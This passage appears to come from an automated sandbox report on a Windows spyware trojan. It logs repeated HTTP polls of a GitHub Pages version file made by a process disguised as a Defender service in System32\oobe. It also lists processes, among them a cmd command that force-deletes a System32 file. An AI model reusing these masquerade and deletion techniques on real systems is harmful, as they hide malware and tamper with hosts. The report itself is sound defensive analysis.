                                                                                                    2024-09-29 00:26:37 UTC18INData Raw: 76 65 72 73 69 6f 6e 3d 32 30 32 34 30 39 31 33 0d 0a
                                                                                                    Data Ascii: version=20240913


                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                    10192.168.2.649728185.199.110.1534432128C:\Windows\System32\oobe\MicrosoftWindowsDefenderCoreService.exe
                                                                                                    TimestampBytes transferredDirectionData
                                                                                                    2024-09-29 00:26:43 UTC61OUTGET /file/version.txt HTTP/1.1
                                                                                                    Host: duy-thanh.github.io
                                                                                                    2024-09-29 00:26:43 UTC752INHTTP/1.1 200 OK
                                                                                                    Connection: close
                                                                                                    Content-Length: 18
                                                                                                    Server: GitHub.com
                                                                                                    Content-Type: text/plain; charset=utf-8
                                                                                                    permissions-policy: interest-cohort=()
                                                                                                    x-origin-cache: HIT
                                                                                                    Last-Modified: Fri, 13 Sep 2024 00:51:35 GMT
                                                                                                    Access-Control-Allow-Origin: *
                                                                                                    Strict-Transport-Security: max-age=31556952
                                                                                                    ETag: "66e38c97-12"
                                                                                                    expires: Sun, 29 Sep 2024 00:36:09 GMT
                                                                                                    Cache-Control: max-age=600
                                                                                                    x-proxy-cache: MISS
                                                                                                    X-GitHub-Request-Id: F769:2C7B00:2B3C52C:300D5F2:66F89EA1
                                                                                                    Accept-Ranges: bytes
                                                                                                    Date: Sun, 29 Sep 2024 00:26:43 GMT
                                                                                                    Via: 1.1 varnish
                                                                                                    Age: 34
                                                                                                    X-Served-By: cache-ewr-kewr1740071-EWR
                                                                                                    X-Cache: HIT
                                                                                                    X-Cache-Hits: 1
                                                                                                    X-Timer: S1727569604.955411,VS0,VE2
                                                                                                    Vary: Accept-Encoding
                                                                                                    X-Fastly-Request-ID: 72638f50b0bbf5bd4b95bf6a6a13ac8c01f40a60
                                                                                                    2024-09-29 00:26:43 UTC18INData Raw: 76 65 72 73 69 6f 6e 3d 32 30 32 34 30 39 31 33 0d 0a
                                                                                                    Data Ascii: version=20240913


                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                    11192.168.2.649729185.199.110.1534432128C:\Windows\System32\oobe\MicrosoftWindowsDefenderCoreService.exe
                                                                                                    TimestampBytes transferredDirectionData
                                                                                                    2024-09-29 00:26:50 UTC61OUTGET /file/version.txt HTTP/1.1
                                                                                                    Host: duy-thanh.github.io
                                                                                                    2024-09-29 00:26:50 UTC752INHTTP/1.1 200 OK
                                                                                                    Connection: close
                                                                                                    Content-Length: 18
                                                                                                    Server: GitHub.com
                                                                                                    Content-Type: text/plain; charset=utf-8
                                                                                                    permissions-policy: interest-cohort=()
                                                                                                    x-origin-cache: HIT
                                                                                                    Last-Modified: Fri, 13 Sep 2024 00:51:35 GMT
                                                                                                    Access-Control-Allow-Origin: *
                                                                                                    Strict-Transport-Security: max-age=31556952
                                                                                                    ETag: "66e38c97-12"
                                                                                                    expires: Sun, 29 Sep 2024 00:36:09 GMT
                                                                                                    Cache-Control: max-age=600
                                                                                                    x-proxy-cache: MISS
                                                                                                    X-GitHub-Request-Id: F769:2C7B00:2B3C52C:300D5F2:66F89EA1
                                                                                                    Accept-Ranges: bytes
                                                                                                    Date: Sun, 29 Sep 2024 00:26:50 GMT
                                                                                                    Via: 1.1 varnish
                                                                                                    Age: 41
                                                                                                    X-Served-By: cache-ewr-kewr1740054-EWR
                                                                                                    X-Cache: HIT
                                                                                                    X-Cache-Hits: 1
                                                                                                    X-Timer: S1727569611.502516,VS0,VE2
                                                                                                    Vary: Accept-Encoding
                                                                                                    X-Fastly-Request-ID: 710eb6f73d5abd90d10b40cc107c24382c0a293c
                                                                                                    2024-09-29 00:26:50 UTC18INData Raw: 76 65 72 73 69 6f 6e 3d 32 30 32 34 30 39 31 33 0d 0a
                                                                                                    Data Ascii: version=20240913


                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                    12192.168.2.649731185.199.110.1534432128C:\Windows\System32\oobe\MicrosoftWindowsDefenderCoreService.exe
                                                                                                    TimestampBytes transferredDirectionData
                                                                                                    2024-09-29 00:26:56 UTC61OUTGET /file/version.txt HTTP/1.1
                                                                                                    Host: duy-thanh.github.io
                                                                                                    2024-09-29 00:26:56 UTC752INHTTP/1.1 200 OK
                                                                                                    Connection: close
                                                                                                    Content-Length: 18
                                                                                                    Server: GitHub.com
                                                                                                    Content-Type: text/plain; charset=utf-8
                                                                                                    permissions-policy: interest-cohort=()
                                                                                                    x-origin-cache: HIT
                                                                                                    Last-Modified: Fri, 13 Sep 2024 00:51:35 GMT
                                                                                                    Access-Control-Allow-Origin: *
                                                                                                    Strict-Transport-Security: max-age=31556952
                                                                                                    ETag: "66e38c97-12"
                                                                                                    expires: Sun, 29 Sep 2024 00:36:09 GMT
                                                                                                    Cache-Control: max-age=600
                                                                                                    x-proxy-cache: MISS
                                                                                                    X-GitHub-Request-Id: F769:2C7B00:2B3C52C:300D5F2:66F89EA1
                                                                                                    Accept-Ranges: bytes
                                                                                                    Date: Sun, 29 Sep 2024 00:26:56 GMT
                                                                                                    Via: 1.1 varnish
                                                                                                    Age: 47
                                                                                                    X-Served-By: cache-ewr-kewr1740077-EWR
                                                                                                    X-Cache: HIT
                                                                                                    X-Cache-Hits: 1
                                                                                                    X-Timer: S1727569616.464132,VS0,VE2
                                                                                                    Vary: Accept-Encoding
                                                                                                    X-Fastly-Request-ID: 4955c39072255e44ced38f0c8faac763a0b0defd
                                                                                                    2024-09-29 00:26:56 UTC18INData Raw: 76 65 72 73 69 6f 6e 3d 32 30 32 34 30 39 31 33 0d 0a
                                                                                                    Data Ascii: version=20240913


                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                    13192.168.2.649733185.199.110.1534432128C:\Windows\System32\oobe\MicrosoftWindowsDefenderCoreService.exe
                                                                                                    TimestampBytes transferredDirectionData
                                                                                                    2024-09-29 00:27:02 UTC61OUTGET /file/version.txt HTTP/1.1
                                                                                                    Host: duy-thanh.github.io
                                                                                                    2024-09-29 00:27:02 UTC752INHTTP/1.1 200 OK
                                                                                                    Connection: close
                                                                                                    Content-Length: 18
                                                                                                    Server: GitHub.com
                                                                                                    Content-Type: text/plain; charset=utf-8
                                                                                                    permissions-policy: interest-cohort=()
                                                                                                    x-origin-cache: HIT
                                                                                                    Last-Modified: Fri, 13 Sep 2024 00:51:35 GMT
                                                                                                    Access-Control-Allow-Origin: *
                                                                                                    Strict-Transport-Security: max-age=31556952
                                                                                                    ETag: "66e38c97-12"
                                                                                                    expires: Sun, 29 Sep 2024 00:36:09 GMT
                                                                                                    Cache-Control: max-age=600
                                                                                                    x-proxy-cache: MISS
                                                                                                    X-GitHub-Request-Id: F769:2C7B00:2B3C52C:300D5F2:66F89EA1
                                                                                                    Accept-Ranges: bytes
                                                                                                    Date: Sun, 29 Sep 2024 00:27:02 GMT
                                                                                                    Via: 1.1 varnish
                                                                                                    Age: 53
                                                                                                    X-Served-By: cache-ewr-kewr1740029-EWR
                                                                                                    X-Cache: HIT
                                                                                                    X-Cache-Hits: 1
                                                                                                    X-Timer: S1727569622.453607,VS0,VE2
                                                                                                    Vary: Accept-Encoding
                                                                                                    X-Fastly-Request-ID: 76c80132655812298931b58c56118a7a6d10804b
                                                                                                    2024-09-29 00:27:02 UTC18INData Raw: 76 65 72 73 69 6f 6e 3d 32 30 32 34 30 39 31 33 0d 0a
                                                                                                    Data Ascii: version=20240913


                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                    14192.168.2.649734185.199.110.1534432128C:\Windows\System32\oobe\MicrosoftWindowsDefenderCoreService.exe
                                                                                                    TimestampBytes transferredDirectionData
                                                                                                    2024-09-29 00:27:08 UTC61OUTGET /file/version.txt HTTP/1.1
                                                                                                    Host: duy-thanh.github.io
                                                                                                    2024-09-29 00:27:08 UTC752INHTTP/1.1 200 OK
                                                                                                    Connection: close
                                                                                                    Content-Length: 18
                                                                                                    Server: GitHub.com
                                                                                                    Content-Type: text/plain; charset=utf-8
                                                                                                    permissions-policy: interest-cohort=()
                                                                                                    x-origin-cache: HIT
                                                                                                    Last-Modified: Fri, 13 Sep 2024 00:51:35 GMT
                                                                                                    Access-Control-Allow-Origin: *
                                                                                                    Strict-Transport-Security: max-age=31556952
                                                                                                    ETag: "66e38c97-12"
                                                                                                    expires: Sun, 29 Sep 2024 00:36:09 GMT
                                                                                                    Cache-Control: max-age=600
                                                                                                    x-proxy-cache: MISS
                                                                                                    X-GitHub-Request-Id: F769:2C7B00:2B3C52C:300D5F2:66F89EA1
                                                                                                    Accept-Ranges: bytes
                                                                                                    Date: Sun, 29 Sep 2024 00:27:08 GMT
                                                                                                    Via: 1.1 varnish
                                                                                                    Age: 59
                                                                                                    X-Served-By: cache-ewr-kewr1740032-EWR
                                                                                                    X-Cache: HIT
                                                                                                    X-Cache-Hits: 1
                                                                                                    X-Timer: S1727569628.415826,VS0,VE2
                                                                                                    Vary: Accept-Encoding
                                                                                                    X-Fastly-Request-ID: 25ed5a18390a0d256320adcfd47779d801ceb01b
                                                                                                    2024-09-29 00:27:08 UTC18INData Raw: 76 65 72 73 69 6f 6e 3d 32 30 32 34 30 39 31 33 0d 0a
                                                                                                    Data Ascii: version=20240913


                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                    15192.168.2.649735185.199.110.1534432128C:\Windows\System32\oobe\MicrosoftWindowsDefenderCoreService.exe
                                                                                                    TimestampBytes transferredDirectionData
                                                                                                    2024-09-29 00:27:14 UTC61OUTGET /file/version.txt HTTP/1.1
                                                                                                    Host: duy-thanh.github.io
                                                                                                    2024-09-29 00:27:14 UTC752INHTTP/1.1 200 OK
                                                                                                    Connection: close
                                                                                                    Content-Length: 18
                                                                                                    Server: GitHub.com
                                                                                                    Content-Type: text/plain; charset=utf-8
                                                                                                    permissions-policy: interest-cohort=()
                                                                                                    x-origin-cache: HIT
                                                                                                    Last-Modified: Fri, 13 Sep 2024 00:51:35 GMT
                                                                                                    Access-Control-Allow-Origin: *
                                                                                                    Strict-Transport-Security: max-age=31556952
                                                                                                    ETag: "66e38c97-12"
                                                                                                    expires: Sun, 29 Sep 2024 00:36:09 GMT
                                                                                                    Cache-Control: max-age=600
                                                                                                    x-proxy-cache: MISS
                                                                                                    X-GitHub-Request-Id: F769:2C7B00:2B3C52C:300D5F2:66F89EA1
                                                                                                    Accept-Ranges: bytes
                                                                                                    Date: Sun, 29 Sep 2024 00:27:14 GMT
                                                                                                    Via: 1.1 varnish
                                                                                                    Age: 65
                                                                                                    X-Served-By: cache-ewr-kewr1740050-EWR
                                                                                                    X-Cache: HIT
                                                                                                    X-Cache-Hits: 9
                                                                                                    X-Timer: S1727569634.408812,VS0,VE0
                                                                                                    Vary: Accept-Encoding
                                                                                                    X-Fastly-Request-ID: b14100ae6737e5c0198733870b0e5bf9b4bbb920
                                                                                                    2024-09-29 00:27:14 UTC18INData Raw: 76 65 72 73 69 6f 6e 3d 32 30 32 34 30 39 31 33 0d 0a
                                                                                                    Data Ascii: version=20240913


                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                    16192.168.2.649736185.199.110.1534432128C:\Windows\System32\oobe\MicrosoftWindowsDefenderCoreService.exe
                                                                                                    TimestampBytes transferredDirectionData
                                                                                                    2024-09-29 00:27:20 UTC61OUTGET /file/version.txt HTTP/1.1
                                                                                                    Host: duy-thanh.github.io
                                                                                                    2024-09-29 00:27:20 UTC752INHTTP/1.1 200 OK
                                                                                                    Connection: close
                                                                                                    Content-Length: 18
                                                                                                    Server: GitHub.com
                                                                                                    Content-Type: text/plain; charset=utf-8
                                                                                                    permissions-policy: interest-cohort=()
                                                                                                    x-origin-cache: HIT
                                                                                                    Last-Modified: Fri, 13 Sep 2024 00:51:35 GMT
                                                                                                    Access-Control-Allow-Origin: *
                                                                                                    Strict-Transport-Security: max-age=31556952
                                                                                                    ETag: "66e38c97-12"
                                                                                                    expires: Sun, 29 Sep 2024 00:36:09 GMT
                                                                                                    Cache-Control: max-age=600
                                                                                                    x-proxy-cache: MISS
                                                                                                    X-GitHub-Request-Id: F769:2C7B00:2B3C52C:300D5F2:66F89EA1
                                                                                                    Accept-Ranges: bytes
                                                                                                    Date: Sun, 29 Sep 2024 00:27:20 GMT
                                                                                                    Via: 1.1 varnish
                                                                                                    Age: 71
                                                                                                    X-Served-By: cache-ewr-kewr1740055-EWR
                                                                                                    X-Cache: HIT
                                                                                                    X-Cache-Hits: 1
                                                                                                    X-Timer: S1727569640.421463,VS0,VE3
                                                                                                    Vary: Accept-Encoding
                                                                                                    X-Fastly-Request-ID: cb3d330bea8236e279c45386b8d41750e4a3a0b9
                                                                                                    2024-09-29 00:27:20 UTC18INData Raw: 76 65 72 73 69 6f 6e 3d 32 30 32 34 30 39 31 33 0d 0a
                                                                                                    Data Ascii: version=20240913


                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                    17192.168.2.649737185.199.110.1534432128C:\Windows\System32\oobe\MicrosoftWindowsDefenderCoreService.exe
                                                                                                    TimestampBytes transferredDirectionData
                                                                                                    2024-09-29 00:27:26 UTC61OUTGET /file/version.txt HTTP/1.1
                                                                                                    Host: duy-thanh.github.io
                                                                                                    2024-09-29 00:27:26 UTC752INHTTP/1.1 200 OK
                                                                                                    Connection: close
                                                                                                    Content-Length: 18
                                                                                                    Server: GitHub.com
                                                                                                    Content-Type: text/plain; charset=utf-8
                                                                                                    permissions-policy: interest-cohort=()
                                                                                                    x-origin-cache: HIT
                                                                                                    Last-Modified: Fri, 13 Sep 2024 00:51:35 GMT
                                                                                                    Access-Control-Allow-Origin: *
                                                                                                    Strict-Transport-Security: max-age=31556952
                                                                                                    ETag: "66e38c97-12"
                                                                                                    expires: Sun, 29 Sep 2024 00:36:09 GMT
                                                                                                    Cache-Control: max-age=600
                                                                                                    x-proxy-cache: MISS
                                                                                                    X-GitHub-Request-Id: F769:2C7B00:2B3C52C:300D5F2:66F89EA1
                                                                                                    Accept-Ranges: bytes
                                                                                                    Date: Sun, 29 Sep 2024 00:27:26 GMT
                                                                                                    Via: 1.1 varnish
                                                                                                    Age: 77
                                                                                                    X-Served-By: cache-ewr-kewr1740038-EWR
                                                                                                    X-Cache: HIT
                                                                                                    X-Cache-Hits: 1
                                                                                                    X-Timer: S1727569647.603709,VS0,VE4
                                                                                                    Vary: Accept-Encoding
                                                                                                    X-Fastly-Request-ID: 46b5bf0045f4ef5f8a576433915680f49ca66af8
                                                                                                    2024-09-29 00:27:26 UTC18INData Raw: 76 65 72 73 69 6f 6e 3d 32 30 32 34 30 39 31 33 0d 0a
                                                                                                    Data Ascii: version=20240913


                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                    18192.168.2.649739185.199.110.1534432128C:\Windows\System32\oobe\MicrosoftWindowsDefenderCoreService.exe
                                                                                                    TimestampBytes transferredDirectionData
                                                                                                    2024-09-29 00:27:32 UTC61OUTGET /file/version.txt HTTP/1.1
                                                                                                    Host: duy-thanh.github.io
                                                                                                    2024-09-29 00:27:32 UTC731INHTTP/1.1 200 OK
                                                                                                    Connection: close
                                                                                                    Content-Length: 18
                                                                                                    Server: GitHub.com
                                                                                                    Content-Type: text/plain; charset=utf-8
                                                                                                    permissions-policy: interest-cohort=()
                                                                                                    Last-Modified: Fri, 13 Sep 2024 00:51:35 GMT
                                                                                                    Access-Control-Allow-Origin: *
                                                                                                    Strict-Transport-Security: max-age=31556952
                                                                                                    ETag: "66e38c97-12"
                                                                                                    expires: Sun, 29 Sep 2024 00:36:17 GMT
                                                                                                    Cache-Control: max-age=600
                                                                                                    x-proxy-cache: MISS
                                                                                                    X-GitHub-Request-Id: 9139:1C52C8:26F8EF8:2B104B9:66F89EA8
                                                                                                    Accept-Ranges: bytes
                                                                                                    Age: 75
                                                                                                    Date: Sun, 29 Sep 2024 00:27:32 GMT
                                                                                                    Via: 1.1 varnish
                                                                                                    X-Served-By: cache-nyc-kteb1890078-NYC
                                                                                                    X-Cache: HIT
                                                                                                    X-Cache-Hits: 0
                                                                                                    X-Timer: S1727569653.844802,VS0,VE1
                                                                                                    Vary: Accept-Encoding
                                                                                                    X-Fastly-Request-ID: ee8fa0e5f165a34e006807c5ba96ad657b2dfd5a
                                                                                                    2024-09-29 00:27:32 UTC18INData Raw: 76 65 72 73 69 6f 6e 3d 32 30 32 34 30 39 31 33 0d 0a
                                                                                                    Data Ascii: version=20240913


                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                    19192.168.2.649740185.199.110.1534432128C:\Windows\System32\oobe\MicrosoftWindowsDefenderCoreService.exe
                                                                                                    TimestampBytes transferredDirectionData
                                                                                                    2024-09-29 00:27:39 UTC61OUTGET /file/version.txt HTTP/1.1
                                                                                                    Host: duy-thanh.github.io
                                                                                                    2024-09-29 00:27:39 UTC752INHTTP/1.1 200 OK
                                                                                                    Connection: close
                                                                                                    Content-Length: 18
                                                                                                    Server: GitHub.com
                                                                                                    Content-Type: text/plain; charset=utf-8
                                                                                                    permissions-policy: interest-cohort=()
                                                                                                    x-origin-cache: HIT
                                                                                                    Last-Modified: Fri, 13 Sep 2024 00:51:35 GMT
                                                                                                    Access-Control-Allow-Origin: *
                                                                                                    Strict-Transport-Security: max-age=31556952
                                                                                                    ETag: "66e38c97-12"
                                                                                                    expires: Sun, 29 Sep 2024 00:36:09 GMT
                                                                                                    Cache-Control: max-age=600
                                                                                                    x-proxy-cache: MISS
                                                                                                    X-GitHub-Request-Id: F769:2C7B00:2B3C52C:300D5F2:66F89EA1
                                                                                                    Accept-Ranges: bytes
                                                                                                    Date: Sun, 29 Sep 2024 00:27:39 GMT
                                                                                                    Via: 1.1 varnish
                                                                                                    Age: 90
                                                                                                    X-Served-By: cache-ewr-kewr1740062-EWR
                                                                                                    X-Cache: HIT
                                                                                                    X-Cache-Hits: 1
                                                                                                    X-Timer: S1727569659.230596,VS0,VE2
                                                                                                    Vary: Accept-Encoding
                                                                                                    X-Fastly-Request-ID: e2060851b14f1b6bc8afae8c30e94ec82ef1e814
                                                                                                    2024-09-29 00:27:39 UTC18INData Raw: 76 65 72 73 69 6f 6e 3d 32 30 32 34 30 39 31 33 0d 0a
                                                                                                    Data Ascii: version=20240913


                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                    20192.168.2.649741185.199.110.1534432128C:\Windows\System32\oobe\MicrosoftWindowsDefenderCoreService.exe
                                                                                                    TimestampBytes transferredDirectionData
                                                                                                    2024-09-29 00:27:45 UTC61OUTGET /file/version.txt HTTP/1.1
                                                                                                    Host: duy-thanh.github.io
                                                                                                    2024-09-29 00:27:45 UTC752INHTTP/1.1 200 OK
                                                                                                    Connection: close
                                                                                                    Content-Length: 18
                                                                                                    Server: GitHub.com
                                                                                                    Content-Type: text/plain; charset=utf-8
                                                                                                    permissions-policy: interest-cohort=()
                                                                                                    x-origin-cache: HIT
                                                                                                    Last-Modified: Fri, 13 Sep 2024 00:51:35 GMT
                                                                                                    Access-Control-Allow-Origin: *
                                                                                                    Strict-Transport-Security: max-age=31556952
                                                                                                    ETag: "66e38c97-12"
                                                                                                    expires: Sun, 29 Sep 2024 00:36:09 GMT
                                                                                                    Cache-Control: max-age=600
                                                                                                    x-proxy-cache: MISS
                                                                                                    X-GitHub-Request-Id: F769:2C7B00:2B3C52C:300D5F2:66F89EA1
                                                                                                    Accept-Ranges: bytes
                                                                                                    Date: Sun, 29 Sep 2024 00:27:45 GMT
                                                                                                    Via: 1.1 varnish
                                                                                                    Age: 96
                                                                                                    X-Served-By: cache-ewr-kewr1740025-EWR
                                                                                                    X-Cache: HIT
                                                                                                    X-Cache-Hits: 1
                                                                                                    X-Timer: S1727569666.705263,VS0,VE2
                                                                                                    Vary: Accept-Encoding
                                                                                                    X-Fastly-Request-ID: ae1dfb2d30a008b86c8990514ac8892f8f153163
                                                                                                    2024-09-29 00:27:45 UTC18INData Raw: 76 65 72 73 69 6f 6e 3d 32 30 32 34 30 39 31 33 0d 0a
                                                                                                    Data Ascii: version=20240913


                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                    21192.168.2.649742185.199.110.1534432128C:\Windows\System32\oobe\MicrosoftWindowsDefenderCoreService.exe
                                                                                                    TimestampBytes transferredDirectionData
                                                                                                    2024-09-29 00:27:52 UTC61OUTGET /file/version.txt HTTP/1.1
                                                                                                    Host: duy-thanh.github.io
                                                                                                    2024-09-29 00:27:52 UTC753INHTTP/1.1 200 OK
                                                                                                    Connection: close
                                                                                                    Content-Length: 18
                                                                                                    Server: GitHub.com
                                                                                                    Content-Type: text/plain; charset=utf-8
                                                                                                    permissions-policy: interest-cohort=()
                                                                                                    x-origin-cache: HIT
                                                                                                    Last-Modified: Fri, 13 Sep 2024 00:51:35 GMT
                                                                                                    Access-Control-Allow-Origin: *
                                                                                                    Strict-Transport-Security: max-age=31556952
                                                                                                    ETag: "66e38c97-12"
                                                                                                    expires: Sun, 29 Sep 2024 00:36:09 GMT
                                                                                                    Cache-Control: max-age=600
                                                                                                    x-proxy-cache: MISS
                                                                                                    X-GitHub-Request-Id: F769:2C7B00:2B3C52C:300D5F2:66F89EA1
                                                                                                    Accept-Ranges: bytes
                                                                                                    Date: Sun, 29 Sep 2024 00:27:52 GMT
                                                                                                    Via: 1.1 varnish
                                                                                                    Age: 103
                                                                                                    X-Served-By: cache-ewr-kewr1740048-EWR
                                                                                                    X-Cache: HIT
                                                                                                    X-Cache-Hits: 1
                                                                                                    X-Timer: S1727569672.139972,VS0,VE3
                                                                                                    Vary: Accept-Encoding
                                                                                                    X-Fastly-Request-ID: 6f1d2b9b36ebac204e9d46fe839e123aa8b71a17
                                                                                                    2024-09-29 00:27:52 UTC18INData Raw: 76 65 72 73 69 6f 6e 3d 32 30 32 34 30 39 31 33 0d 0a
                                                                                                    Data Ascii: version=20240913


                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                    22192.168.2.649743185.199.110.1534432128C:\Windows\System32\oobe\MicrosoftWindowsDefenderCoreService.exe
                                                                                                    TimestampBytes transferredDirectionData
                                                                                                    2024-09-29 00:27:58 UTC61OUTGET /file/version.txt HTTP/1.1
                                                                                                    Host: duy-thanh.github.io
                                                                                                    2024-09-29 00:27:58 UTC753INHTTP/1.1 200 OK
                                                                                                    Connection: close
                                                                                                    Content-Length: 18
                                                                                                    Server: GitHub.com
                                                                                                    Content-Type: text/plain; charset=utf-8
                                                                                                    permissions-policy: interest-cohort=()
                                                                                                    x-origin-cache: HIT
                                                                                                    Last-Modified: Fri, 13 Sep 2024 00:51:35 GMT
                                                                                                    Access-Control-Allow-Origin: *
                                                                                                    Strict-Transport-Security: max-age=31556952
                                                                                                    ETag: "66e38c97-12"
                                                                                                    expires: Sun, 29 Sep 2024 00:36:09 GMT
                                                                                                    Cache-Control: max-age=600
                                                                                                    x-proxy-cache: MISS
                                                                                                    X-GitHub-Request-Id: F769:2C7B00:2B3C52C:300D5F2:66F89EA1
                                                                                                    Accept-Ranges: bytes
                                                                                                    Date: Sun, 29 Sep 2024 00:27:58 GMT
                                                                                                    Via: 1.1 varnish
                                                                                                    Age: 109
                                                                                                    X-Served-By: cache-ewr-kewr1740052-EWR
                                                                                                    X-Cache: HIT
                                                                                                    X-Cache-Hits: 1
                                                                                                    X-Timer: S1727569678.418008,VS0,VE2
                                                                                                    Vary: Accept-Encoding
                                                                                                    X-Fastly-Request-ID: 7be212b60ff8cbffa1d58ff9e604c1880f483aa2
                                                                                                    2024-09-29 00:27:58 UTC18INData Raw: 76 65 72 73 69 6f 6e 3d 32 30 32 34 30 39 31 33 0d 0a
                                                                                                    Data Ascii: version=20240913


                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                    23192.168.2.649744185.199.110.1534432128C:\Windows\System32\oobe\MicrosoftWindowsDefenderCoreService.exe
                                                                                                    TimestampBytes transferredDirectionData
                                                                                                    2024-09-29 00:28:04 UTC61OUTGET /file/version.txt HTTP/1.1
                                                                                                    Host: duy-thanh.github.io
                                                                                                    2024-09-29 00:28:04 UTC753INHTTP/1.1 200 OK
                                                                                                    Connection: close
                                                                                                    Content-Length: 18
                                                                                                    Server: GitHub.com
                                                                                                    Content-Type: text/plain; charset=utf-8
                                                                                                    permissions-policy: interest-cohort=()
                                                                                                    x-origin-cache: HIT
                                                                                                    Last-Modified: Fri, 13 Sep 2024 00:51:35 GMT
                                                                                                    Access-Control-Allow-Origin: *
                                                                                                    Strict-Transport-Security: max-age=31556952
                                                                                                    ETag: "66e38c97-12"
                                                                                                    expires: Sun, 29 Sep 2024 00:36:09 GMT
                                                                                                    Cache-Control: max-age=600
                                                                                                    x-proxy-cache: MISS
                                                                                                    X-GitHub-Request-Id: F769:2C7B00:2B3C52C:300D5F2:66F89EA1
                                                                                                    Accept-Ranges: bytes
                                                                                                    Date: Sun, 29 Sep 2024 00:28:04 GMT
                                                                                                    Via: 1.1 varnish
                                                                                                    Age: 115
                                                                                                    X-Served-By: cache-ewr-kewr1740056-EWR
                                                                                                    X-Cache: HIT
                                                                                                    X-Cache-Hits: 1
                                                                                                    X-Timer: S1727569685.729017,VS0,VE2
                                                                                                    Vary: Accept-Encoding
                                                                                                    X-Fastly-Request-ID: 0ef4b84c4a4b714368d9503bbc4d43347da3e8d4
                                                                                                    2024-09-29 00:28:04 UTC18INData Raw: 76 65 72 73 69 6f 6e 3d 32 30 32 34 30 39 31 33 0d 0a
                                                                                                    Data Ascii: version=20240913


                                                                                                    Statistics

                                                                                                    CPU Usage

                                                                                                    Click to jump to process

                                                                                                    Memory Usage

                                                                                                    Click to jump to process

                                                                                                    Behavior

                                                                                                    Click to jump to process

                                                                                                    System Behavior

                                                                                                    General

                                                                                                    Target ID:0
                                                                                                    Start time:20:25:57
                                                                                                    Start date:28/09/2024
                                                                                                    Path:C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Win64.Spy.1125.10281.exe
                                                                                                    Wow64 process (32bit):false
                                                                                                    Commandline:"C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Win64.Spy.1125.10281.exe"
                                                                                                    Imagebase:0x7ff6c7850000
                                                                                                    File size:161'792 bytes
                                                                                                    MD5 hash:95408095927F78DEFFAEB9CB1F4CD44D
                                                                                                    Has elevated privileges:true
                                                                                                    Has administrator privileges:true
                                                                                                    Programmed in:C, C++ or other language
                                                                                                    Reputation:low
                                                                                                    Has exited:true

                                                                                                    General

                                                                                                    Target ID:1
                                                                                                    Start time:20:25:57
                                                                                                    Start date:28/09/2024
                                                                                                    Path:C:\Windows\System32\conhost.exe
                                                                                                    Wow64 process (32bit):false
                                                                                                    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                    Imagebase:0x7ff66e660000
                                                                                                    File size:862'208 bytes
                                                                                                    MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                    Has elevated privileges:true
                                                                                                    Has administrator privileges:true
                                                                                                    Programmed in:C, C++ or other language
                                                                                                    Reputation:high
                                                                                                    Has exited:true

                                                                                                    General

                                                                                                    Target ID:2
                                                                                                    Start time:20:25:57
                                                                                                    Start date:28/09/2024
                                                                                                    Path:C:\Windows\System32\cmd.exe
                                                                                                    Wow64 process (32bit):false
                                                                                                    Commandline:C:\Windows\system32\cmd.exe /c DEL /F /S /Q "C:\Windows\System32\WindowsUpdate.txt"
                                                                                                    Imagebase:0x7ff61e120000
                                                                                                    File size:289'792 bytes
                                                                                                    MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                                    Has elevated privileges:true
                                                                                                    Has administrator privileges:true
                                                                                                    Programmed in:C, C++ or other language
                                                                                                    Reputation:high
                                                                                                    Has exited:true

                                                                                                    General

                                                                                                    Target ID:5
                                                                                                    Start time:20:26:02
                                                                                                    Start date:28/09/2024
                                                                                                    Path:C:\Windows\System32\oobe\MicrosoftWindowsDefenderCoreService.exe
                                                                                                    Wow64 process (32bit):false
                                                                                                    Commandline:"C:\Windows\System32\oobe\MicrosoftWindowsDefenderCoreService.exe" install
                                                                                                    Imagebase:0x7ff76e180000
                                                                                                    File size:143'872 bytes
                                                                                                    MD5 hash:9CEBC167FF7C8AE3CCFFB718FD7B52D0
                                                                                                    Has elevated privileges:true
                                                                                                    Has administrator privileges:true
                                                                                                    Programmed in:C, C++ or other language
                                                                                                    Antivirus matches:
                                                                                                    • Detection: 42%, ReversingLabs
                                                                                                    Reputation:low
                                                                                                    Has exited:true

                                                                                                    General

                                                                                                    Target ID:6
                                                                                                    Start time:20:26:02
                                                                                                    Start date:28/09/2024
                                                                                                    Path:C:\Windows\System32\conhost.exe
                                                                                                    Wow64 process (32bit):false
                                                                                                    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                    Imagebase:0x7ff66e660000
                                                                                                    File size:862'208 bytes
                                                                                                    MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                    Has elevated privileges:true
                                                                                                    Has administrator privileges:true
                                                                                                    Programmed in:C, C++ or other language
                                                                                                    Reputation:high
                                                                                                    Has exited:true

                                                                                                    General

                                                                                                    Target ID:7
                                                                                                    Start time:20:26:02
                                                                                                    Start date:28/09/2024
                                                                                                    Path:C:\Windows\System32\oobe\AnyDeskCrashHandler.exe
                                                                                                    Wow64 process (32bit):false
                                                                                                    Commandline:"C:\Windows\System32\oobe\AnyDeskCrashHandler.exe" --pid 6636
                                                                                                    Imagebase:0x7ff7aa950000
                                                                                                    File size:60'416 bytes
                                                                                                    MD5 hash:8EB4565C6C7096C17AC94718B2A3724B
                                                                                                    Has elevated privileges:true
                                                                                                    Has administrator privileges:true
